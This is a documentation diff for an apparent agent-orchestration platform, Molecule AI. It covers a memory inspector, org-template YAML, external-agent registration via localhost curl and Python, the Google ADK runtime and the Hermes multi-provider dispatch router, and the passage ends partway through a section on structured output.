+The **Memory Inspector** (Side Panel → Memory tab, 🧠 icon) lets you browse, search, and inspect all `LOCAL` and `TEAM` memory keys for any workspace — live, without leaving the canvas.
+
+- **Browse** — all memory keys for the selected workspace, grouped by HMA scope (`LOCAL`, `TEAM`)
+- **Semantic search** — enter a query to run `GET /workspaces/:id/memories?q=<query>` against the vector index; results are colour-coded by cosine similarity score
+- **Inspect** — click any key to expand its full value and metadata (`created_at`, scope, last writer)
+
+The inspector polls on workspace selection change and on each heartbeat. Changes from agents running in parallel appear within one heartbeat cycle (~15s).
+
+## How they fit together
+
+A typical org definition:
+
+```yaml
+org_name: My Team
+defaults:
+  runtime: claude-code
+  tier: 2
+  plugins: [ecc, molecule-dev, superpowers, molecule-careful-bash]
+  category_routing:
+    security: [Backend Engineer]
+    ui: [Frontend Engineer]
+
+workspaces:
+  - name: PM
+    role: "Product manager — triages issues, reviews PRs, unblocks the team."
+    canvas: { x: 400, y: 50 }
+    plugins: [molecule-workflow-triage]
+    channels:
+      - type: telegram
+        config: { bot_token: "${TELEGRAM_BOT_TOKEN}", chat_id: "12345" }
+    children:
+      - name: Dev Lead
+        role: "Tech lead — coordinates engineering sub-teams and owns architecture."
+        children:
+          - name: Frontend Engineer
+            role: "Frontend specialist — React, TypeScript, Canvas UI."
+          - name: Backend Engineer
+            role: "Backend specialist — Go platform, API, migrations, CI."
+            schedules:
+              - name: Hourly typecheck
+                cron_expr: "0 * * * *"
+                prompt: "Run npm run typecheck and report any new errors..."
+```
+
+That's the mental model. Templates → plugins → channels → schedules →
+tokens → canvas. Everything else in the docs is depth on one of these
+primitives.
+
+## MCP integration
+
+Any MCP-compatible AI agent can manage Molecule AI workspaces using the
+[MCP Server](/docs/mcp-server) — 87 tools covering workspace CRUD,
+communication, secrets, memory, files, schedules, channels, plugins,
+and more. Install via `npx @molecule-ai/mcp-server`.
--- a/content/docs/development/build-order.md
+++ b/content/docs/development/build-order.md
@ -1,3 +1,6 @@
+---
+title: "Build Order"
+---
 # Build Order

 The core loop to prove first: **workspace registers -> canvas shows it -> heartbeat keeps it alive -> workspace goes offline -> canvas shows it gray.**
--- a/content/docs/development/code-sandbox.md
+++ b/content/docs/development/code-sandbox.md
@ -1,3 +1,6 @@
+---
+title: "Code Sandbox"
+---
 # Code Sandbox

 The code sandbox isolates agent-generated code execution — specifically the `run_code` tool that executes dynamically generated scripts. Not user-submitted code (there is no user code submission in Molecule AI) — the agent's own generated code is what needs sandboxing.
--- a/content/docs/development/constraints-and-rules.md
+++ b/content/docs/development/constraints-and-rules.md
@ -1,3 +1,6 @@
+---
+title: "Constraints & Rules"
+---
 # Constraints & Rules

 Key design rules and invariants that must be followed throughout the codebase.
--- a/content/docs/development/local-development.md
+++ b/content/docs/development/local-development.md
@ -1,3 +1,6 @@
+---
+title: "Local Development"
+---
 # Local Development

 ## Starting the Stack
--- a/content/docs/development/observability.md
+++ b/content/docs/development/observability.md
@ -1,3 +1,6 @@
+---
+title: "Observability (Langfuse)"
+---
 # Observability (Langfuse)

 ## Overview
--- a/content/docs/development/testing-e2e.md
+++ b/content/docs/development/testing-e2e.md
@ -1,3 +1,6 @@
+---
+title: "E2E Testing"
+---
 # E2E Testing

 End-to-end test scripts live under `tests/e2e/` and exercise the platform against a real Postgres + Redis. Every script is shellcheck-clean and shares helpers from `tests/e2e/_lib.sh` + `tests/e2e/_extract_token.py`.
--- a/content/docs/external-agents.mdx
+++ b/content/docs/external-agents.mdx
@ -0,0 +1,239 @@
+---
+title: External Agents
+description: Register agents running outside the platform's Docker network as first-class workspaces on the canvas.
+---
+
+External agents are AI agents running on your own infrastructure — a different
+cloud, an edge device, or your laptop — that join the Molecule AI canvas as
+first-class workspaces. They communicate with other agents via A2A, appear on
+the canvas with a purple **REMOTE** badge, and are managed like any other workspace.
+
+## Prerequisites
+
+- A running Molecule AI platform (default `http://localhost:8080`)
+- Your agent must expose an HTTP endpoint that accepts A2A JSON-RPC messages
+
+## Step 1 — Create the workspace
+
+```bash
+curl -X POST http://localhost:8080/workspaces \
+  -H "Content-Type: application/json" \
+  -d '{
+    "name": "My External Agent",
+    "external": true,
+    "url": "https://my-agent.example.com",
+    "tier": 2
+  }'
+```
+
+The response includes the workspace `id`. Save it.
+
+<Callout type="warn">
+URLs must be publicly reachable. Private IPs (10.x, 172.16.x, 192.168.x, 127.x,
+169.254.x) are rejected for SSRF protection.
+</Callout>
+
+## Step 2 — Register with the platform
+
+```bash
+curl -X POST http://localhost:8080/registry/register \
+  -H "Content-Type: application/json" \
+  -d '{
+    "workspace_id": "<id-from-step-1>",
+    "url": "https://my-agent.example.com",
+    "agent_card": {
+      "name": "My Agent",
+      "description": "Research assistant",
+      "skills": ["research", "analysis"],
+      "runtime": "external"
+    }
+  }'
+```
+
+The response includes `auth_token` — **save this immediately**, it is shown only
+once and cannot be recovered.
+
+## Step 3 — Start the heartbeat loop
+
+Send a heartbeat every 30 seconds to keep your workspace online:
+
+```bash
+curl -X POST http://localhost:8080/registry/heartbeat \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer <auth_token>" \
+  -d '{
+    "workspace_id": "<id>",
+    "status": "online",
+    "active_tasks": 0,
+    "current_task": "",
+    "error_rate": 0.0,
+    "uptime_seconds": 3600
+  }'
+```
+
+If the heartbeat stops for 60 seconds, the workspace automatically goes offline.
+
+## Step 4 — Handle incoming A2A messages
+
+Your agent must accept POST requests at the registered URL with A2A JSON-RPC format:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "message/send",
+  "params": {
+    "message": {
+      "role": "user",
+      "parts": [{"type": "text", "text": "Hello from another agent"}]
+    }
+  },
+  "id": "req-123"
+}
+```
+
+Respond with a JSON-RPC result:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "status": "completed",
+    "artifacts": [
+      {
+        "parts": [{"type": "text", "text": "Hello back!"}]
+      }
+    ]
+  },
+  "id": "req-123"
+}
+```
+
+## Step 5 — Send messages to other agents
+
+```bash
+curl -X POST http://localhost:8080/workspaces/<target-id>/a2a \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer <auth_token>" \
+  -H "X-Workspace-ID: <your-workspace-id>" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "Can you help with this?"}]
+      }
+    },
+    "id": "msg-001"
+  }'
+```
+
+## Step 6 — Discover peers
+
+```bash
+# Your workspace info
+curl http://localhost:8080/registry/discover/<your-id> \
+  -H "Authorization: Bearer <auth_token>" \
+  -H "X-Workspace-ID: <your-id>"
+
+# Find siblings/parent/child workspaces
+curl http://localhost:8080/registry/<your-id>/peers \
+  -H "Authorization: Bearer <auth_token>" \
+  -H "X-Workspace-ID: <your-id>"
+```
+
+## Communication rules
+
+| Relationship | Allowed? |
+|---|---|
+| Same workspace | Yes |
+| Siblings (same parent) | Yes |
+| Parent to child | Yes |
+| Child to parent | Yes |
+| Root-level siblings | Yes |
+| Everything else | No |
+
+## Python example
+
+```python
+import requests
+import threading
+import time
+from flask import Flask, request, jsonify
+
+PLATFORM = "http://localhost:8080"
+
+# 1. Create workspace
+ws = requests.post(f"{PLATFORM}/workspaces", json={
+    "name": "Python Research Agent",
+    "external": True,
+    "url": "http://my-host:5000",
+    "tier": 2,
+}).json()
+WS_ID = ws["id"]
+
+# 2. Register
+reg = requests.post(f"{PLATFORM}/registry/register", json={
+    "workspace_id": WS_ID,
+    "url": "http://my-host:5000",
+    "agent_card": {
+        "name": "Python Research Agent",
+        "skills": ["research"],
+        "runtime": "external",
+    },
+}).json()
+TOKEN = reg["auth_token"]
+HEADERS = {"Authorization": f"Bearer {TOKEN}"}
+
+# 3. Heartbeat loop
+def heartbeat():
+    while True:
+        requests.post(f"{PLATFORM}/registry/heartbeat",
+            json={"workspace_id": WS_ID, "active_tasks": 0},
+            headers=HEADERS)
+        time.sleep(30)
+
+threading.Thread(target=heartbeat, daemon=True).start()
+
+# 4. A2A endpoint
+app = Flask(__name__)
+
+@app.route("/", methods=["POST"])
+def handle_a2a():
+    data = request.json
+    text = data["params"]["message"]["parts"][0]["text"]
+    return jsonify({
+        "jsonrpc": "2.0",
+        "result": {
+            "status": "completed",
+            "artifacts": [{"parts": [{"type": "text", "text": f"Received: {text}"}]}],
+        },
+        "id": data["id"],
+    })
+
+app.run(host="0.0.0.0", port=5000)
+```
+
+## Canvas appearance
+
+External workspaces appear on the canvas with a purple **REMOTE** badge.
+They support drag-and-drop positioning, nesting into teams, real-time status
+updates via heartbeat, and chat via A2A messages.
+
+## Lifecycle
+
+```
+create (POST /workspaces) → online (register) → offline (heartbeat expires)
+                                                → removed (deleted)
+```
+
+- External workspaces skip Docker health sweep — only heartbeat TTL matters
+- No auto-restart (agent manages its own process)
+- Paused external workspaces skip heartbeat monitoring
+
+## Security
+
+- Bearer token required on all authenticated endpoints
+- Tokens are 256-bit random, sha256-hashed — only the hash is stored
+- Token shown once at registration, never recoverable
+- See [Token Management](/docs/tokens) for create/list/revoke API
--- a/content/docs/frontend/canvas.md
+++ b/content/docs/frontend/canvas.md
@ -1,3 +1,6 @@
+---
+title: "Canvas UI (Next.js Frontend)"
+---
 # Canvas UI (Next.js Frontend)

 The canvas is Molecule AI's operational UI. It is not just a graph viewer. It is the place where teams deploy workspaces, inspect live state, configure runtimes, browse files, watch activity, and chat with agents.
--- a/content/docs/google-adk.mdx
+++ b/content/docs/google-adk.mdx
@ -0,0 +1,311 @@
+---
+title: Google ADK Runtime
+description: Run Molecule AI workspaces on Google's Agent Development Kit (ADK) — Gemini-native agents with sequential, parallel, and loop workflows.
+---
+
+import { Callout } from 'fumadocs-ui/components/callout';
+
+# Google ADK Runtime
+
+The `google-adk` runtime adapter integrates [Google's Agent Development Kit](https://github.com/google/adk-python) (v1.0+, Apache-2.0) into Molecule AI workspaces. ADK is Google's production-grade Python framework for building AI agents backed by Gemini models, with built-in support for sequential, parallel, and loop execution patterns.
+
+<Callout type="info">
+  Google ADK adapter was added in PR #550 (issue #542). It passes 46/46 tests with 100% coverage.
+</Callout>
+
+---
+
+## When to use Google ADK vs other runtimes
+
+| | Google ADK | LangGraph | AutoGen |
+|---|---|---|---|
+| **Best for** | Gemini-native agents, Google Cloud integrations | Complex stateful graphs, fine-grained flow control | Multi-agent dialogue and code-execution workflows |
+| **Model family** | Gemini (gemini-2.0-flash, gemini-1.5-pro, …) | Any LangChain-supported model | Any AutoGen-supported model |
+| **Execution model** | Sequential / Parallel / Loop built-in | Explicit graph with nodes and edges | Conversation-driven, agents negotiate through dialogue |
+| **Tool support** | Google-native + LangChain tools | LangChain tools | Python functions, code execution |
+| **State persistence** | ADK SessionService | LangGraph checkpointer | In-process conversation history |
+| **Google Cloud fit** | First-class | Via LangChain integrations | Via plugin |
+
+**Choose Google ADK when:**
+- Your workload is Google Cloud–native (Vertex AI, Cloud Tools, Google Workspace)
+- You want Gemini models with minimal adapter overhead
+- You prefer ADK's opinionated sequential/parallel/loop composition over explicit graph edges
+- You're building agents that call Google APIs (Maps, Search, Drive, etc.)
+
+---
+
+## Installation
+
+Each Molecule AI workspace template is a standalone Docker image. The Google ADK workspace template (`molecule-ai-workspace-template-google-adk`) ships with the adapter pre-configured. To use it, set the runtime in your workspace `config.yaml`:
+
+```yaml title="config.yaml"
+runtime: google-adk
+model: google:gemini-2.0-flash
+```
+
+If you are building a custom image on top of `molecule-ai-workspace-runtime`, add the adapter dependency to your `requirements.txt`:
+
+```text title="requirements.txt"
+molecule-ai-workspace-runtime>=0.1.0
+google-adk>=1.0.0
+```
+
+Install manually with pip:
+
+```bash
+pip install google-adk
+```
+
+<Callout type="warn">
+  Google ADK requires **Python 3.10+**. Ensure your workspace Dockerfile uses `python:3.11-slim` or newer.
+</Callout>
+
+---
+
+## Secrets
+
+The adapter reads your Google credentials from workspace secrets. Set these before starting a Google ADK workspace:
+
+| Secret key | Required | Purpose |
+|---|---|---|
+| `GOOGLE_API_KEY` | Yes (unless using Vertex AI) | Gemini API key from [Google AI Studio](https://aistudio.google.com/app/apikey) |
+| `GOOGLE_CLOUD_PROJECT` | Vertex AI only | GCP project ID |
+| `GOOGLE_CLOUD_LOCATION` | Vertex AI only | Region (e.g. `us-central1`) |
+| `GOOGLE_GENAI_USE_VERTEXAI` | Vertex AI only | Set to `true` to route via Vertex AI instead of the public API |
+
+Set secrets via the canvas Settings panel or the API:
+
+```bash
+curl -X PUT http://localhost:8080/settings/secrets \
+  -H 'Content-Type: application/json' \
+  -d '{"key":"GOOGLE_API_KEY","value":"AIza..."}'
+```
+
+---
+
+## Quickstart
+
+Once you have set `GOOGLE_API_KEY` (see [Secrets](#secrets) above), these steps take you from zero to a running workspace with a working multi-turn conversation:
+
+```bash
+# 1. Create a google-adk workspace
+WS=$(curl -s -X POST http://localhost:8080/workspaces \
+  -H "Content-Type: application/json" \
+  -d '{
+    "name": "adk-agent",
+    "role": "Google ADK inference worker",
+    "runtime": "google-adk",
+    "model": "google:gemini-2.0-flash"
+  }' | jq -r '.id')
+echo "Workspace: $WS"
+
+# 2. Wait for ready (~30s)
+until curl -s http://localhost:8080/workspaces/$WS \
+    | jq -r '.status' | grep -q ready; do
+  echo "Waiting..."; sleep 5
+done
+
+# 3. Send your first task
+curl -s -X POST http://localhost:8080/workspaces/$WS/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "id": "1",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"kind": "text", "text": "Summarise the ADK architecture in 3 bullet points."}]
+      }
+    }
+  }' | jq '.result.parts[0].text'
+
+# 4. Multi-turn — session state is preserved across calls
+curl -s -X POST http://localhost:8080/workspaces/$WS/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "id": "2",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"kind": "text", "text": "Now give me a one-line TL;DR of what you just said."}]
+      }
+    }
+  }' | jq '.result.parts[0].text'
+
+# 5. Vertex AI alternative — set these instead of GOOGLE_API_KEY
+# curl -X PUT http://localhost:8080/settings/secrets \
+#   -d '{"key":"GOOGLE_GENAI_USE_VERTEXAI","value":"1"}'
+# curl -X PUT http://localhost:8080/settings/secrets \
+#   -d '{"key":"GOOGLE_CLOUD_PROJECT","value":"my-gcp-project"}'
+# curl -X PUT http://localhost:8080/settings/secrets \
+#   -d '{"key":"GOOGLE_CLOUD_LOCATION","value":"us-central1"}'
+```
+
+**How session state works:** the adapter maps each A2A `context_id` to an `InMemorySessionService` session. State is isolated per context and persists across calls within the same session — so the agent in step 4 recalls the answer from step 3 without any orchestrator history management. To persist sessions across workspace restarts, set `session_db_url` in `runtime_config` (see [Configuration reference](#configuration-reference)).
+
+**Model prefix stripping:** the adapter strips the `google:` prefix before passing the model name to ADK — `google:gemini-2.0-flash` becomes `gemini-2.0-flash`. Always use the `google:` prefix in your workspace config; the adapter handles the rest.
+
+---
+
+## Basic usage
+
+### Minimal `config.yaml`
+
+```yaml title="config.yaml"
+name: My ADK Agent
+runtime: google-adk
+model: google:gemini-2.0-flash
+role: |
+  You are a helpful assistant. Answer questions clearly and concisely.
+tier: 2
+```
+
+### With runtime configuration
+
+```yaml title="config.yaml"
+name: Research Agent
+runtime: google-adk
+model: google:gemini-1.5-pro
+role: |
+  You are a research specialist. Gather and synthesise information from multiple sources.
+tier: 2
+
+runtime_config:
+  max_iterations: 20
+  enable_code_execution: true
+  temperature: 0.3
+```
+
+### Org template example
+
+```yaml title="org-template/org.yaml"
+org_name: Research Team
+defaults:
+  runtime: google-adk
+  model: google:gemini-2.0-flash
+  tier: 2
+
+workspaces:
+  - name: Research Lead
+    role: Coordinate research tasks and synthesise findings from your team.
+    children:
+      - name: Web Researcher
+        role: Search the web and extract relevant information.
+        runtime_config:
+          enable_code_execution: false
+      - name: Data Analyst
+        role: Analyse datasets and produce statistical summaries.
+        runtime_config:
+          enable_code_execution: true
+```
+
+---
+
+## Configuration reference
+
+All options go under `runtime_config:` in `config.yaml`.
+
+| Option | Type | Default | Description |
+|---|---|---|---|
+| `max_iterations` | integer | `10` | Maximum agent reasoning steps per turn |
+| `temperature` | float | `0.0` | Sampling temperature passed to the Gemini model (0.0–2.0) |
+| `enable_code_execution` | boolean | `false` | Allow the agent to execute Python code via ADK's built-in code-execution tool |
+| `output_key` | string | `"output"` | Key in the ADK session state that holds the agent's final response |
+| `session_db_url` | string | `null` | SQLite or Postgres URL for ADK session persistence across restarts. If null, uses in-memory session storage. |
+
+---
+
+## Tools and plugins
+
+The Google ADK adapter is fully compatible with Molecule AI's plugin system. Plugins installed in a workspace are injected into the ADK agent's tool list via the runtime's plugin registry.
+
+**Supported plugin shapes with Google ADK:**
+
+| Plugin shape | Supported | Notes |
+|---|---|---|
+| MCP server | Yes | Tools exposed via MCP are wrapped as ADK `FunctionTool` instances |
+| Skill files | Yes | Skills are injected into the system prompt |
+| Hook scripts | Yes | `PreToolUse` / `PostToolUse` / `UserPromptSubmit` hooks fire normally |
+| Slash commands | Yes | Commands are routed through the workspace A2A server as usual |
+
+Example: adding the `superpowers` plugin to a Google ADK workspace:
+
+```yaml title="config.yaml"
+runtime: google-adk
+model: google:gemini-2.0-flash
+plugins:
+  - superpowers
+  - molecule-dev
+```
+
+---
+
+## A2A communication
+
+Google ADK workspaces participate in the full Molecule AI A2A network — they can receive tasks from parent agents, delegate to children, and send messages to siblings — identically to any other runtime.
+
+The adapter injects the standard A2A MCP tools (`list_peers`, `delegate_task`, `delegate_task_async`, `send_message_to_user`, `commit_memory`, `recall_memory`) into the ADK agent's tool list automatically.
+
+---
+
+## Transcript support
+
+The Google ADK adapter exposes live session transcripts to the canvas "look over shoulder" view. Each agent turn (tool calls, model responses) is streamed as it completes.
+
+---
+
+## Comparison: config.yaml across runtimes
+
+<br />
+
+```yaml title="LangGraph workspace"
+runtime: langgraph
+model: anthropic:claude-opus-4-7
+```
+
+```yaml title="AutoGen workspace"
+runtime: autogen
+model: openai:gpt-4o
+```
+
+```yaml title="Google ADK workspace"
+runtime: google-adk
+model: google:gemini-2.0-flash
+runtime_config:
+  temperature: 0.1
+```
+
+The `model` field follows `<provider>:<model-id>` format. For Google ADK, the `google:` prefix routes through the `google-genai` LangChain integration.
+
+---
+
+## Troubleshooting
+
+### `google.api_core.exceptions.InvalidArgument: 400 API key not valid`
+
+Your `GOOGLE_API_KEY` secret is missing or invalid. Check it in the canvas Settings panel and verify it in [Google AI Studio](https://aistudio.google.com/app/apikey).
+
+### `RuntimeError: google-adk is not installed`
+
+The workspace image is missing the `google-adk` Python package. If you are using a custom image, ensure `requirements.txt` includes `google-adk>=1.0.0` and rebuild the image.
+
+### Agent returns empty response after tool calls
+
+Check `max_iterations` in `runtime_config`. If the agent hits the iteration cap mid-task, it returns the last partial result. Increase `max_iterations` or break the task into smaller sub-tasks via A2A delegation.
+
+### Vertex AI 403 Permission Denied
+
+Ensure `GOOGLE_CLOUD_PROJECT`, `GOOGLE_CLOUD_LOCATION`, and `GOOGLE_GENAI_USE_VERTEXAI=true` are all set, and that your service account has the `roles/aiplatform.user` IAM role on the project.
+
+---
+
+## See also
+
+- [Architecture — Workspace Runtime](/docs/architecture#workspace-runtime) — how adapters fit into the runtime
+- [Concepts — Workspaces](/docs/concepts#workspaces) — workspace primitives
+- [Org Template](/docs/org-template) — deploy a full team from a YAML definition
+- [Plugins](/docs/plugins) — extend your ADK agents with hooks, skills, and MCP servers
+- [Google ADK Python on GitHub](https://github.com/google/adk-python) — upstream documentation
--- a/content/docs/guides/index.md
+++ b/content/docs/guides/index.md
@ -1,3 +1,6 @@
+---
+title: "Guides"
+---
 # Guides

 Step-by-step guides for common Molecule AI integrations and configurations.
--- a/content/docs/guides/skill-catalog.md
+++ b/content/docs/guides/skill-catalog.md
@ -1,3 +1,6 @@
+---
+title: "Skill Catalog"
+---
 # Skill Catalog

 Skills extend what a workspace agent can do — from browser automation
--- a/content/docs/hermes.mdx
+++ b/content/docs/hermes.mdx
@ -0,0 +1,345 @@
+---
+title: Hermes Runtime & Multi-Provider Dispatch
+description: Hermes is Molecule AI's built-in inference router. Route tasks to Anthropic, Gemini, or any OpenAI-compatible model through native dispatch paths — with correct multi-turn history on all three.
+---
+
+import { Callout } from 'fumadocs-ui/components/callout';
+
+# Hermes Runtime & Multi-Provider Dispatch
+
+Hermes is Molecule AI's built-in inference router powering `runtime: hermes` workspaces. It supports three dispatch paths — a native Anthropic Messages API path, a native Gemini `generateContent` path, and an OpenAI-compatible shim for 13+ other providers — keyed automatically by which API secret is present on the workspace.
+
+Phases 2a through 2e are fully merged to `main`:
+
+- **Phase 2a** (PR #240) — native Anthropic dispatch
+- **Phase 2b** (PR #255) — native Gemini dispatch with correct `role: "model"` + `parts` wire format
+- **Phase 2c** (PR #267) — correct multi-turn history preserved as turns (not flattened) on all three paths
+- **Phase 2d** (PR #499) — stacked system messages (`system_blocks` kwarg) on Anthropic and Gemini paths
+- **Phase 2e** (PRs #644, #645) — native `tools=[]` parameter + `response_format=json_schema` structured output on Anthropic native path
+
+<Callout type="info">
+  **Remaining roadmap:** vision content blocks and streaming on native paths are scoped for a future release.
+</Callout>
+
+---
+
+## Dispatch table
+
+Hermes selects an inference path based on which API key is set on the workspace. Keys are resolved in priority order:
+
+> `HERMES_API_KEY` → `OPENROUTER_API_KEY` → `ANTHROPIC_API_KEY` → `GEMINI_API_KEY`
+
+The first key found wins. Don't set `HERMES_API_KEY` if you want native Anthropic or Gemini dispatch — it takes priority and routes through the OpenAI-compat shim.
+
+| Key present | Dispatch path | Provider | Wire format |
+|---|---|---|---|
+| `ANTHROPIC_API_KEY` | Native Anthropic | Anthropic | Messages API — `{role, content}` |
+| `GEMINI_API_KEY` | Native Gemini | Google | `generateContent` — `{role: "model", parts: [{text}]}` |
+| `OPENROUTER_API_KEY` / `HERMES_API_KEY` / other | OpenAI-compat shim | 13+ providers | OpenAI Chat Completions |
+| None | Error | — | — |
+
+**Fail-loud semantics:** if `ANTHROPIC_API_KEY` is set but the `anthropic` Python package is not installed in the workspace image, Hermes raises a `RuntimeError` immediately — before any inference attempt. Same for `google-genai`. Silent fallback to the compat shim would mask format errors; Hermes fails loudly instead.
+
+---
+
+## Secrets
+
+Set provider keys as global or workspace-level secrets:
+
+```bash
+# Native Anthropic dispatch
+curl -X PUT http://localhost:8080/settings/secrets \
+  -H "Content-Type: application/json" \
+  -d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-..."}'
+
+# Native Gemini dispatch
+curl -X PUT http://localhost:8080/settings/secrets \
+  -H "Content-Type: application/json" \
+  -d '{"key":"GEMINI_API_KEY","value":"YOUR-GEMINI-KEY"}'
+
+# OpenAI-compat shim (OpenRouter, Groq, Mistral, etc.)
+curl -X PUT http://localhost:8080/settings/secrets \
+  -H "Content-Type: application/json" \
+  -d '{"key":"OPENROUTER_API_KEY","value":"sk-or-..."}'
+```
+
+To force a specific workspace to use Gemini dispatch when a global `ANTHROPIC_API_KEY` is set, clear the key at the workspace level:
+
+```bash
+curl -X PUT http://localhost:8080/workspaces/$GEMINI_WS/secrets \
+  -H "Content-Type: application/json" \
+  -d '{"key":"ANTHROPIC_API_KEY","value":""}'
+```
+
+---
+
+## Quickstart
+
+### Native Anthropic dispatch
+
+```bash
+export MOLECULE_API=http://localhost:8080
+
+# 1. Store your Anthropic key
+curl -s -X PUT $MOLECULE_API/settings/secrets \
+  -H "Content-Type: application/json" \
+  -d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-YOUR-KEY"}' | jq .
+
+# 2. Create a Hermes workspace
+ANTHROPIC_WS=$(curl -s -X POST $MOLECULE_API/workspaces \
+  -H "Content-Type: application/json" \
+  -d '{
+    "name": "hermes-anthropic",
+    "role": "Inference worker — native Anthropic path",
+    "runtime": "hermes",
+    "model": "anthropic:claude-sonnet-4-5"
+  }' | jq -r '.id')
+
+# 3. Wait for ready
+until curl -s $MOLECULE_API/workspaces/$ANTHROPIC_WS \
+    | jq -r '.status' | grep -q ready; do sleep 5; done
+
+# 4. Confirm dispatch path
+curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc":"2.0","id":"probe-1","method":"message/send",
+    "params":{"message":{"role":"user","parts":[{"kind":"text",
+    "text":"Which provider API are you calling to generate this response?"}]}}
+  }' | jq '.result.parts[0].text'
+# Expected: confirms Anthropic Messages API — no OpenAI-compat translation layer
+```
+
+### Native Gemini dispatch
+
+```bash
+# 1. Store your Gemini key
+curl -s -X PUT $MOLECULE_API/settings/secrets \
+  -H "Content-Type: application/json" \
+  -d '{"key":"GEMINI_API_KEY","value":"YOUR-GEMINI-KEY"}' | jq .
+
+# 2. Create a Gemini workspace
+GEMINI_WS=$(curl -s -X POST $MOLECULE_API/workspaces \
+  -H "Content-Type: application/json" \
+  -d '{
+    "name": "hermes-gemini",
+    "role": "Inference worker — native Gemini path",
+    "runtime": "hermes",
+    "model": "gemini:gemini-2.0-flash"
+  }' | jq -r '.id')
+
+# 3. Wait for ready
+until curl -s $MOLECULE_API/workspaces/$GEMINI_WS \
+    | jq -r '.status' | grep -q ready; do sleep 5; done
+
+# 4. Confirm dispatch path
+curl -s -X POST $MOLECULE_API/workspaces/$GEMINI_WS/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc":"2.0","id":"probe-2","method":"message/send",
+    "params":{"message":{"role":"user","parts":[{"kind":"text",
+    "text":"Which provider API are you calling?"}]}}
+  }' | jq '.result.parts[0].text'
+# Expected: confirms Google generateContent — role: "model" + parts[] wrapper used correctly
+```
+
+### Multi-turn history (Phase 2c)
+
+```bash
+# Turn 1
+curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc":"2.0","id":"turn-1","method":"message/send",
+    "params":{"message":{"role":"user","parts":[{"kind":"text",
+    "text":"My name is Alice. Remember that."}]}}
+  }' | jq '.result.parts[0].text'
+
+# Turn 2 — history is threaded as turns, not flattened into a single blob
+curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc":"2.0","id":"turn-2","method":"message/send",
+    "params":{"message":{"role":"user","parts":[{"kind":"text",
+    "text":"What is my name?"}]}}
+  }' | jq '.result.parts[0].text'
+# Expected: "Alice" — role attribution is preserved across turns
+```
+
+Before Phase 2c, multi-turn history was flattened into a single user blob. The model could often recover context from the text but lost clean role attribution, which caused failures on structured prompts. Phase 2c passes turns as turns: OpenAI and Anthropic use `{role, content}`; Gemini uses `{role: "model", parts: [{text}]}`.
+
+---
+
+## Multi-provider teams
+
+An orchestrator can fan tasks to Anthropic and Gemini workers simultaneously, each routed through its native path — no application-level provider switching required:
+
+```bash
+# Fan out — both workers fire via delegate_task_async
+curl -s -X POST $MOLECULE_API/workspaces/$ORCH_ID/a2a \
+  -H "Content-Type: application/json" \
+  -d "{
+    \"jsonrpc\":\"2.0\",\"id\":\"fan-1\",\"method\":\"message/send\",
+    \"params\":{\"message\":{\"role\":\"user\",\"parts\":[{\"kind\":\"text\",
+    \"text\":\"delegate_task_async $ANTHROPIC_WS 'Draft release notes for v2.1' AND delegate_task_async $GEMINI_WS 'Summarise the last 30 days of support tickets'\"}]}}
+  }" | jq .
+```
+
+Both workers receive correctly formatted messages through their native paths. No LiteLLM proxy layer. No format translation overhead on every request.
+
+---
+
+## Advanced: stacked system messages
+
+[NousResearch Hermes 4](https://hermes4.nousresearch.com) works best when persona, tool context, and reasoning policy are sent as **separate** `{"role": "system"}` entries rather than one concatenated string. `HermesA2AExecutor` supports this via the `system_blocks` kwarg (PR #499).
+
+### Usage
+
+```python
+from workspace_template.executors.hermes_a2a_executor import HermesA2AExecutor
+
+executor = HermesA2AExecutor(
+    system_blocks=[
+        "You are a senior security auditor. Be terse and precise.",   # persona
+        "You have access to bash, file search, and grep tools.",       # tools context
+        "Think step-by-step before concluding. Cite evidence.",        # reasoning policy
+    ]
+)
+```
+
+The executor emits each non-empty, non-`None` block as a separate `{"role": "system"}` message in the recommended order: **persona → tools context → reasoning policy**.
+
+### Behaviour
+
+| Condition | Result |
+|-----------|--------|
+| `system_blocks` is set | Emits one `{"role": "system"}` per non-empty block; `system_prompt` is ignored |
+| Entry is `None` or `""` | Silently skipped |
+| All entries empty | Zero system messages emitted |
+| `system_blocks` not set (`None`) | Falls back to the legacy `system_prompt` path — **fully backward-compatible** |
+
+### Backward compatibility
+
+Callers that pass a single `system_prompt` string are **unaffected**:
+
+```python
+# Legacy path — still works, no changes required
+executor = HermesA2AExecutor(
+    system_prompt="You are a security auditor. Think step-by-step."
+)
+```
+
+Only set `system_blocks` when you want fine-grained control over block ordering or need to inject tool manifests into a dedicated block.
+
+---
+
+## Native tools parameter (Phase 2e — PR #644)
+
+Hermes now passes tool definitions to the model via the native `tools=[]` API parameter instead of injecting them as text in the prompt. This applies to the **Anthropic native dispatch path** and produces structured tool call/result blocks that the Nous/Hermes-3 tool call format handles correctly.
+
+```python
+executor = HermesA2AExecutor(
+    tools=[
+        {
+            "name": "bash",
+            "description": "Run a bash command and return stdout/stderr.",
+            "input_schema": {
+                "type": "object",
+                "properties": {
+                    "command": {"type": "string", "description": "The shell command to run"}
+                },
+                "required": ["command"]
+            }
+        }
+    ]
+)
+```
+
+The OpenAI-compat shim path also accepts `tools=[]` but continues to inject them as text-in-prompt for compatibility with OpenRouter-routed models that don't natively support tool calls.
+
+## Structured output — `response_format` (Phase 2e — PR #645)
+
